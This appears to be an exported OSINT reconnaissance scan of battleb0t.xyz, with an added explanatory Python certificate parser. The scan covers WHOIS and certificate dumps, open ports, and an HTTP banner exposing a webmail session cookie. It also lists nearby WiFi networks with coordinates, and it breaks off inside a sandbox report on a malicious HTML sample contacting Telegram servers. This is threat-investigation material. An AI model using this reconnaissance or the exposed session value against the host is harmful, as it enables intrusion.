Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| cloudflare.com |
| 2023-05-12 02:56:53 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | panel.battleb0t.xyz | [{"url": "https://panel.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://panel.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:50:15 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:23:1a:4a:59:35:02:c1:c6:ee:ce:b0:90:2b:32:ff:c3:73:
00:60:2e:9e:f9:30:da:4e:15:e2:5a:99:e8:dc:18:9e:39:ed:
69:f1:83:a4:0a:04:28:db:64:81:bf:64:61:e9:65:9c:4b:bf:
43:b4:21:89:ab:e2:5c:b4:ea:8e:55:b3:f4:e4:d9:42:3e:20:
e0:83:2a:75:f9:b5:2c:98:6f:90:e7:e4:4a:86:e5:ab:f3:97:
c8:a9:85:ff:6a:e9:35:8d:3d:30:f6:db:5e:e0:f1:27:f3:d3:
e7:f7:29:be:31:75:49:43:f6:99:93:6d:06:65:d1:3e:4c:29:
66:fd:2f:93:e9:c6:ec:30:8a:f2:58:08:03:45:02:a0:57:b1:
3b:0b:b4:a9:ed:aa:8b:9f:ac:43:5a:55:10:bb:1e:31:d5:e4:
c1:37:cd:22:a3:bd:26:b6:f1:01:e1:68:e2:c6:50:80:44:4b:
cd:a0:4a:80:cc:93:e4:1b:7e:d7:af:21:2c:ce:f2:c1:d0:70:
17:ad:3a:29:15:d4:b9:ee:11:c8:aa:7f:fa:b4:9a:33:05:ef:
47:de:10:55:c2:f1:9f:19:e4:ad:0a:83:ff:a1:86:3d:18:bd:
73:d4:39:8b:bb:51:02:17:cb:89:c6:27:d9:b8:f2:7c:d7:bd:
a5:b5:9a:11
|
| 2023-05-12 02:55:11 | Operating System | No | Censys | 0 | 0 | 2 | 0 | None | linux | 87.248.157.102 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.189): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:28:03 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [185.199.111.133]<br>https://www.virustotal.com/en/ip-address/185.199.111.133/information/ | 185.199.111.0/24 |
| 2023-05-12 03:43:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 87.248.157.79:80 | 87.248.157.0/24 |
| 2023-05-12 02:55:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3e:fe:f9:21:a8:b9:ff:5b:d7:4e:56:e9:01:36:22:e4:80:7b:
32:28:4f:35:ce:d9:fe:79:61:21:91:08:a4:5a:99:cb:49:8d:
59:33:d8:1c:63:9a:1f:c2:49:d5:16:41:55:df:2b:23:f2:e9:
b3:cc:0e:45:14:b2:fe:94:7d:98:ee:51:3e:fe:8e:d3:e9:26:
e4:d9:13:e1:5b:9d:72:18:78:d0:8e:68:17:2a:3e:77:ec:ab:
7d:44:bc:01:fc:dc:0f:8f:d3:cb:10:ee:22:15:6e:05:13:f7:
e6:22:b4:eb:f4:fb:8e:2b:69:d7:32:d7:d5:70:69:43:51:d5:
4b:6b:0b:f8:e5:1a:2e:d7:2d:1d:78:46:8f:ca:f0:7d:23:fd:
88:d0:03:3c:9a:6c:c7:d3:59:0a:bf:a1:53:93:a9:52:44:05:
4e:9a:e7:34:e3:cf:4e:d3:8f:b2:a4:32:fc:7a:56:50:19:02:
1d:b0:d0:f6:ba:1e:0f:f4:0e:1e:fe:53:40:02:f1:88:3c:f3:
9b:b6:f5:bd:4d:b4:cd:f4:5c:5c:d1:5e:1f:d8:bc:e4:0a:75:
d6:3d:a2:7f:13:a1:4d:66:3a:7b:eb:4a:cf:7e:00:5d:ee:3b:
c3:4d:5a:49:d1:0b:e5:67:dc:0a:d3:3c:d7:f1:60:9d:30:79:
0a:39:a4:60
| battleb0t.xyz |
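Both certificate rows above (funny.battleb0t.xyz from the DNS Resolver row and fluid.battleb0t.xyz from the Certificate Transparency row) are `openssl x509 -text`-style dumps that carry the `CT Precertificate Poison` extension, and the fluid.battleb0t.xyz one had already expired by the scan date. The following is an added example (not SpiderFoot or openssl code) that parses that text form and attaches those two caveats; `SAMPLE_CERT_TEXT` is a constructed, trimmed copy of the fluid.battleb0t.xyz entry with key and signature bytes dropped, and `SCAN_TIME` is that row's "Date Found" read as UTC, which is an assumption since the export states no zone.

```python
"""Parse openssl-text certificate dumps like the two battleb0t.xyz rows above and
report what each one means at scan time.

Added example, not SpiderFoot or openssl code. SAMPLE_CERT_TEXT is a constructed,
trimmed copy of the fluid.battleb0t.xyz precertificate (key/signature omitted);
SCAN_TIME is the row's 'Date Found' taken as UTC (assumption).
"""
import re
from datetime import datetime, timezone
from typing import Dict, List

SAMPLE_CERT_TEXT = """Certificate:
Data:
Version: 3 (0x2)
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
CT Precertificate Poison: critical
NULL
"""

SCAN_TIME = datetime(2023, 5, 12, 2, 55, 44, tzinfo=timezone.utc)


def _parse_openssl_time(raw: str) -> datetime:
    """'Mar 27 01:46:46 2023 GMT' -> aware UTC datetime (openssl pads the day with spaces)."""
    parts = raw.split()
    if parts and parts[-1] in ("GMT", "UTC"):
        parts = parts[:-1]
    return datetime.strptime(" ".join(parts), "%b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)


def parse_cert_text(text: str) -> Dict[str, object]:
    """Pull issuer, subject CN, validity window, SANs and the CT poison flag."""
    lines = [ln.strip() for ln in text.splitlines()]
    info: Dict[str, object] = {"issuer": None, "cn": None, "not_before": None,
                               "not_after": None, "sans": [], "precert": False}
    for i, ln in enumerate(lines):
        if ln.startswith("Issuer:"):
            info["issuer"] = ln.split(":", 1)[1].strip()
        elif ln.startswith("Subject:"):
            m = re.search(r"CN=([^,/]+)", ln)
            info["cn"] = m.group(1).strip() if m else None
        elif ln.startswith("Not Before"):
            info["not_before"] = _parse_openssl_time(ln.split(":", 1)[1])
        elif ln.startswith("Not After"):
            info["not_after"] = _parse_openssl_time(ln.split(":", 1)[1])
        elif ln.startswith("X509v3 Subject Alternative Name") and i + 1 < len(lines):
            # SAN entries sit on the following line: "DNS:a, DNS:b"
            info["sans"] = re.findall(r"DNS:([^,\s]+)", lines[i + 1])
        elif ln.startswith("CT Precertificate Poison"):
            info["precert"] = True
    return info


def assess(info: Dict[str, object], seen_at: datetime) -> List[str]:
    """Findings to attach to the row before treating the certificate as live."""
    findings: List[str] = []
    if info["precert"]:
        # RFC 6962 poison extension: a CT precertificate the CA logged, not the
        # leaf a TLS client would actually receive from the host.
        findings.append("precertificate: taken from a CT log, not observed on the host")
    nb, na = info["not_before"], info["not_after"]
    if nb is None or na is None:
        findings.append("validity window not parsed")
    elif not (nb <= seen_at <= na):
        findings.append("outside validity window at scan time")
    if info["cn"] and info["cn"] not in info["sans"]:
        findings.append("subject CN not present in SAN list")
    return findings


if __name__ == "__main__":
    parsed = parse_cert_text(SAMPLE_CERT_TEXT)
    print(parsed["cn"], parsed["sans"], assess(parsed, SCAN_TIME))
```

Run against the funny.battleb0t.xyz dump instead, the SAN list comes back as both `funny.battleb0t.xyz` and `pics.battleb0t.xyz`, which is how the scan learned the second hostname; the precertificate caveat still applies to it.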
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:67:CB) | 52.3759, 4.8975 |
| 2023-05-12 02:53:42 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.109.153:80 | 185.199.109.153 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.66): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | lcgteach (Net ID: 00:0B:86:22:0F:30) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:32 | Web Server | No | Tool - WhatWeb | 0 | 0 | 3 | 0 | None | cloudflare | panel.battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: webmailsession=%3ai7RZ7smCZHbrrA3k%2cc6f59b16b1db3e998a7645b6e2984b9e; HttpOnly; path=/; port=2095
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2095
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: roundcube_cookies=enabled; HttpOnly; expires=Fri, 10-May-2024 13:43:03 GMT; path=/; port=2095
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12499
| 87.248.157.102 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/carti_1.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | hoenes1 (Net ID: 00:0C:F6:59:F5:B4) | 50.8897, 6.0563 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTY5cg8s2 (Net ID: 88:96:4E:7F:0D:00) | 37.751, -97.822 |
| 2023-05-12 03:00:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.39): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | fotoosman (Net ID: 00:02:CF:D7:57:CF) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FD:64:31) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | curealty (Net ID: 00:0C:41:49:32:21) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:23 | Netblock Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 46.101.128.0/17 | 46.101.229.70 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.178): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00xkhaled.github.io | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PanPanLePanda (Net ID: 00:00:00:00:27:69) | 52.3759, 4.8975 |
| 2023-05-12 02:49:57 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 11, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-65119321.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.110.153:443"\n "13.227.74.65:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6900:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6900:120:WilError_01"\n "Local\\SM0:6900:120:WilError_01"\n "Local\\SM0:6900:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6436:304:WilStaging_02"\n "Local\\SM0:6436:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7504:304:WilStaging_02"\n 
"Local\\SM0:7504:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00006900]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006900]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00006900]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.json]- [targetUID: 00000000-00006900]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006900]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00006900]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\LOG]- [targetUID: 00000000-00006900]\n "473aeb8b-5a6c-41f3-8963-14113874f676.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\473aeb8b-5a6c-41f3-8963-14113874f676.tmp]- [targetUID: 00000000-00006900]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.fingerprint]- [targetUID: 00000000-00006900]\n 
"Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00006900]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\crl-set]- [targetUID: 00000000-00006900]\n "be201c28-8966-423a-a934-6abe0eafb4e2.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 92181"- Location: [%TEMP%\\be201c28-8966-423a-a934-6abe0eafb4e2.tmp]- [targetUID: 00000000-00006900]\n "e843645f-3bd1-42de-964b-e44c1b3d4c5b.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e843645f-3bd1-42de-964b-e44c1b3d4c5b.tmp]- [targetUID: 00000000-00006900]\n "f6a4f247dbf4d697c26b375e3580d6053baf25f5.tbres" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\TokenBroker\\Cache\\f6a4f247dbf4d697c26b375e3580d6053baf25f5.tbres]- [targetUID: 00000000-00006900]\n "9284637b-d0b5-41c3-b074-3e6b43678760.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\9284637b-d0b5-41c3-b074-3e6b43678760.tmp]- [targetUID: 00000000-00006900]\n "dcbb5e88-4a52-456a-b7b5-cd4372e7b57e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\dcbb5e88-4a52-456a-b7b5-cd4372e7b57e.tmp]- [targetUID: 00000000-00006900]\n "History-journal" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History-journal]- [targetUID: 00000000-00006900]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 
104.22.59.100 on port 443"\n "HTTPS traffic to 185.199.110.153 on port 443"\n "HTTPS traffic to 13.227.74.65 on port 443"\n "HTTPS traffic to 149.154.167.220 on port 443"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "XqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydgv\',\'serve\',\'oLeTO\',\'"\n Heuristic match: "api.telegram.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'11/60 Antivirus vendors marked sample as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, 
u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'11/60 Antivirus vendors marked sample as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': 102435, u'job_id': u'63ee0a00ee7f7e33101b746d', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 2, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, 
